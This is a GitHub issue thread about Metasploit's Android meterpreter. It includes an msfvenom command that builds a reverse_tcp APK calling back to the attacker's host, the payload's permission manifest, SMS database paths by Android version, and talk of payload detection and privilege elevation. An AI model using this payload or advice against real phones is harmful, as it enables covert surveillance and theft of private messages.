### ISSUE TITLE
Android_dump_sms operation failed

### ISSUE THREAD

**Issue by blakdash** [rapid7/metasploit-framework#15226]
## How I generate payload 
1. I generated a payload with the command: msfvenom -p android/meterpreter/reverse_tcp LHOST=myIP LPORT=myPORT -o apps.apk
2. Then I installed apps.apk to my android 10 device. 

I run the tool metasploit from my kali linux 2021 device and installed the payload to android 10 device. 

Problem-1: dump_sms returns error message Android_dump_sms operation failed 1 while sysinfo command works perfectly.

Problem-2: The payload gets detected after few minutes of installation. 

## Expected behavior

dump_sms should return sms from android device and it does to lower version of android. 

### Metasploit version

Framework: 6.0.44-dev-94079df
Console  : 6.0.44-dev-94079df

**Comment by acondra2** [comment]
As for Problem 1, without seeing logcat I cannot know if my following statements are true. I have included three possible reasons, that are separated by dash lines. 
-------------------------------------------------------------------------------------------------------------------------------------
One possibility is that the mmssms.db file has changed locations. You could edit the payload to include looking for the mmssms.db file in the newer locations. 

Android 4.3 or older:
/data/data/com.android.providers/telephony/database/mmssms.db

Android 4.4 or later:
/data/data/com.android.providers.telephony/database/mmssms.db

Android 7.0 and above:
/data/user_de/0/com.android.providers.telephony/databases/mmssms.db 
-------------------------------------------------------------------------------------------------------------------------------------

Another possibility is that the phone you are testing is using a non-standard MMS/SMS client such as GoSMS where the database is not named mmssms.db
-------------------------------------------------------------------------------------------------------------------------------------

And another thing is that maybe it is finding the DB but there are no messages in the DB so it returns nothing.

-------------------------------------------------------------------------------------------------------------------------------------

One final thing is that maybe you do not have proper permissions. Have you tried to elevate your privileges?

**Comment by blakdash** [comment]
@acondra2  First of all thank you so much. 

Secondly, I have checked my phone on where I am testing my payload is using standard sms/mms client and database name is mmssms.db.

Thirdly, as I am using android 10 device so it is located in the path you mentioned in your comment but I don't know how to edit payload to include looking for the mmssms.db file in the newer location. **Please guide me here ...** . And with my little experience I could say it worked before  without privilege elevation. 

And finally, As soon as I am in front of my desktop I will include logcat. Thank you again ❤️

**Comment by acondra2** [comment]
rename your file from Payload.apk to Payload.zip and unzip it. post your manifest file here

**Comment by blakdash** [comment]
Here is AndroidManifest file 
...............................................
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.metasploit.stage" platformBuildVersionCode="10" platformBuildVersionName="2.3.3">
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.CALL_PHONE"/>
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.WRITE_CONTACTS"/>
<uses-permission android:name="android.permission.RECORD_AUDIO"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.CAMERA"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.SET_WALLPAPER"/>
<uses-permission android:name="android.permission.READ_CALL_LOG"/>
<uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-feature android:name="android.hardware.camera"/>
<uses-feature android:name="android.hardware.camera.autofocus"/>
<uses-feature android:name="android.hardware.microphone"/>
<application android:label="@string/app_name">
<activity android:label="@string/app_name" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay">
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>
<intent-filter>
<data android:host="my_host" android:scheme="metasploit"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<action android:name="android.intent.action.VIEW"/>
</intent-filter>
</activity>
<receiver android:label="MainBroadcastReceiver" android:name=".MainBroadcastReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED"/>
</intent-filter>
</receiver>
<service android:exported="true" android:name=".MainService"/>
</application>
</manifest>

**Comment by blakdash** [comment]
Here is my AndroidManifest file: 

https://pastebin.com/rh2Wv384

**Comment by Parshuram2** [comment]
> rename your file from Payload.apk to Payload.zip and unzip it. post your manifest file here

Could you please help a little. Is it standard behavior now that shell cannot access android directories now? All I see is a strange folder called `oat`. Asking this for Android 10. opened this question 26 days ago. Got no response. I can change configurations etc. Please let me know, if something of that sort is needed.
